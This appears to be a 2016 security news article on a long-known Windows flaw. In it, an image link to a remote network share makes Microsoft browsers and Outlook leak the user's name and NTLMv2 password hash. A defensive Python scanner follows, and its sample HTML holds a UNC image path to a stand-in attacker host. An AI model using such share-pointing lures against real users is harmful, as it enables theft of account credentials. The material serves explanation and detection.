Microsoft Live Account Credentials Leaking From Windows 8 And Above - ZVEIL

by Moritz Walter August 02, 2016

Discovered in 1997 by Aaron Spangler and never fixed, the WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4) is certainly an excellent vintage. In Windows 8 and 10, the same bug has now been found to potentially leak the user’s Microsoft Live account login and (hashed) password information, which is also used to access OneDrive, Outlook, Office, Mobile, Bing, Xbox Live, MSN and Skype (if used with a Microsoft account).

The bug itself seems to be present in all Windows systems since Windows 95 / NT, although only Windows 8 and above are effectively compromised. To see if your machine is affected, you may want to check the public demonstration of the exploit, set up by the guys from [Perfect Privacy] and based on original work by [ValdikSS].

The exploit as demonstrated by Xiaoran Wang et al. in the white paper.

Basically, the default User Authentication settings of Edge/Spartan (also Internet Explorer and Outlook) let the browser connect to local network shares, but erroneously fail to block connections to remote shares. To exploit this, an attacker would simply set up a network share. An embedded image link that points to that network share is then sent to the victim, for example as part of an email or website. As soon as the prepped content is viewed inside a Microsoft product such as Edge/Spartan, Internet Explorer or Outlook, that software will try to connect to that share in order to download the image. In doing so, it will silently send the user’s Windows login username in plaintext along with the NTLMv2 hash of the login password to the attacker’s network share.

Even though the original issue has existed and been known for more than two decades, its severity has only recently increased. Back in 1997, the attacker would have only obtained your local Windows login data, but in Windows 10, the default login method is the user’s Microsoft Live account. An attacker may have to resort to GPU-assisted hash-cracking to retrieve the password from the NTLMv2 hash (or may not even need to), but the result can be as severe as full compromise, including the mentioned Microsoft services and even remote access.

To mitigate, use a firewall, strengthen your Microsoft Live account password and avoid using Microsoft products such as Edge/Spartan, Internet Explorer (just saying..) and Outlook, as well as VPN connections over IPSec, which may leak VPN credentials in the same way. Firefox and Chrome are not affected.
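A defender-side check for the delivery vector described above, as an added example that is not part of the original article: it scans HTML (a mail body or a web page) for image and link attributes that point at a UNC path or `file://` host outside the local network. The function names, the attribute list and the address ranges treated as local are assumptions of this example, and the sample markup is constructed.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

URL_ATTRS = {"src", "href", "background", "data"}
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")  # \\host\share\...
# Assumption: "local" means RFC 1918, loopback, link-local and IPv6 ULA ranges.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7")]

def smb_host(value):
    """Host a UNC path or file://host/ URL would contact; None for anything else."""
    match = UNC_RE.match(value.strip())
    if match:
        return match.group(1).lower()
    try:
        parts = urlsplit(value.strip())
    except ValueError:  # malformed URL, nothing to resolve
        return None
    return parts.hostname if parts.scheme == "file" else None

def is_remote(host):
    """Heuristic: public IP addresses and dotted names count as remote shares."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "." in host  # single-label (NetBIOS-style) names are treated as LAN
    return not any(addr in net for net in LOCAL_NETS)

def find_remote_share_refs(html):  # -> [(tag, attribute, host), ...]
    findings = []
    class Finder(HTMLParser):
        def handle_starttag(self, tag, attrs):
            for name, value in attrs:
                host = smb_host(value) if name in URL_ATTRS and value else None
                if host and is_remote(host):
                    findings.append((tag, name, host))
    parser = Finder()
    parser.feed(html)
    parser.close()
    return findings

# Constructed sample: two remote references, one LAN share, one ordinary HTTPS image.
SAMPLE = r"""<img src="\\files.attacker.example\share\logo.png">
<img src="file://203.0.113.7/share/pixel.gif">
<img src="\\192.168.1.20\public\team.jpg">
<img src="https://www.example.com/banner.png">"""
```

Calling `find_remote_share_refs(SAMPLE)` reports the two off-network references and ignores the LAN share and the HTTPS image. Internal servers addressed by a dotted name are also flagged under this heuristic and need an allow-list.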

